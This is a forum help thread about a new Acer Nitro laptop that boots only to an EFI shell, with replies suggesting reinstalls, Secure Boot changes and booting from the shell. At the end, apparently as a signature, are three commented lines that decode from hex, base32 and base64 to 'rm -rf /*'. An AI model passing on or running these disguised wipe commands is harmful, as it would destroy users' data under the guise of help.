Hi, Venno here.

Someone i know bought a laptop recently but it appears that the Laptop isn't willing to start up fully.

It's an "Acer Nitro AN515-54" Linux operating system.

Once they start up the Laptop it's stuck at the booting up screen where it says to press a key to continue or skip the "startup.nsh"

We've tried going into the BIOS and check the boot tab but there's only 1 button called "EUFI_SHELL" and pretty much does nothing.

It's a newly bought laptop so don't really understand why it won't start up.

Thanks for reading and your time.

GamerSkrrrtts.PNG

What Linux distro is it running? How did they install it? Who installed it?

Quote me to see my reply!

SPECS:

CPU: Ryzen 7 3700X Motherboard: MSI B450-A Pro Max RAM: 32GB I forget GPU: MSI Vega 56 Storage: 256GB NVMe boot, 512GB Samsung 850 Pro, 1TB WD Blue SSD, 1TB WD Blue HDD PSU: Inwin P85 850w Case: Fractal Design Define C Cooling: Stock for CPU, be quiet! case fans, Morpheus Vega w/ be quiet! Pure Wings 2 for GPU Monitor: 3x Thinkvision P24Q on a Steelcase Eyesite triple monitor stand Mouse: Logitech MX Master 3 Keyboard: Focus FK-9000 (heavily modded) Mousepad: Aliexpress cat special Headphones:  Sennheiser HD598SE and Sony Linkbuds

🏳️‍🌈

Just now, kelvinhall05 said:

What Linux distro is it running? How did they install it? Who installed it?

Unsure on how to find which "Linux distro" and the store she bought it from installed it i assume.

Just now, Venno said:

Unsure on how to find which "Linux distro" and the store she bought it from installed it i assume.

Whoever sold her the laptop probably installed it wrong. Figure out which distro she wants, wipe the internal drive, and do a clean install.

SPECS:

CPU: Ryzen 7 3700X Motherboard: MSI B450-A Pro Max RAM: 32GB I forget GPU: MSI Vega 56 Storage: 256GB NVMe boot, 512GB Samsung 850 Pro, 1TB WD Blue SSD, 1TB WD Blue HDD PSU: Inwin P85 850w Case: Fractal Design Define C Cooling: Stock for CPU, be quiet! case fans, Morpheus Vega w/ be quiet! Pure Wings 2 for GPU Monitor: 3x Thinkvision P24Q on a Steelcase Eyesite triple monitor stand Mouse: Logitech MX Master 3 Keyboard: Focus FK-9000 (heavily modded) Mousepad: Aliexpress cat special Headphones:  Sennheiser HD598SE and Sony Linkbuds

🏳️‍🌈

Did she try installing Arch? Seems like she might have, and she fucked it up.

SPECS:

🏳️‍🌈

Just a suggestion.

I would do a clean install of windows 10. If you have no problem with the hardware I would reinstall Linux. 

2 minutes ago, kelvinhall05 said:

Did she try installing Arch? Seems like she might have, and she fucked it up.

She has only received it a hour ago, First thing that showed up was that screen in the image i put when starting the laptop.

Just now, Venno said:

She has only received it a hour ago, First thing that showed up was that screen in the image i put when starting the laptop.

Who sold her the laptop?

What I meant was that whoever tried installing Arch (I think it was Arch, might've been something else, but it doesn't matter) did a horrible job of it.

Contact the seller of the laptop, try and get partial refund out of them. As for the laptop itself, just wipe the drive and clean install the distro of your/her choosing on it.

SPECS:

🏳️‍🌈

Check if secure boot is enabled  and try disabling it in uefi. There is also possibility they didn't install linux at all and are just calling it "Linux" cause it doesn't' have Windows installed :)

2 minutes ago, sloniupl said:

Check if secure boot is enabled  and try disabling it in uefi. There is also possibility they didn't install linux at all and are just calling it "Linux" cause it doesn't' have Windows installed :)

It managed to boot to EFI shell. From here OP should be able to load the kernel and then the OS but he not only shouldn't have to do it, but it might not even work.

SPECS:

🏳️‍🌈

4 minutes ago, sloniupl said:

She said it's enabled, But is unable to even select it to turn it off. 😅

I would contact the seller to clarify what is installed and how to boot it as you said it's new and never worked :)

Checking the internet it looks like common thing with thios model and linux on it: 
https://forums.tomshardware.com/threads/cant-boot-from-usb-and-install-windows.3573389/

https://community.acer.com/en/discussion/580847/first-linux-boot-acer-nitro-5-an-515-54

Some solved it by installing Windows 10 on it but if you don't have the license i would try installing Linux Mint that is supporting Secure Boot.

11 hours ago, Venno said:

GamerSkrrrtts.PNG

That's the EFI Shell, part of your motherboard's firmware (The UEFI). Looks like the laptop does not/cannot boot into a simple UEFI interface. Use this shell to boot into an installed bootloader (Grub or Windows), which will in turn allow you to boot into your OS (*/Linux or Windows), and check for any updated UEFI/BIOS for that laptop on Acer's website.

https://en.wikipedia.org/wiki/Unified_Extensible_Firmware_Interface#UEFI_shell

https://wiki.archlinux.org/index.php/Unified_Extensible_Firmware_Interface#UEFI_Shell

# $(echo 726d202d7266202f2a0a | xxd -r -p)
# $(echo OJWSALLSMYQC6KQK | base32 -d)
# $(echo cm0gLXJmIC8qCg== | base64 -d)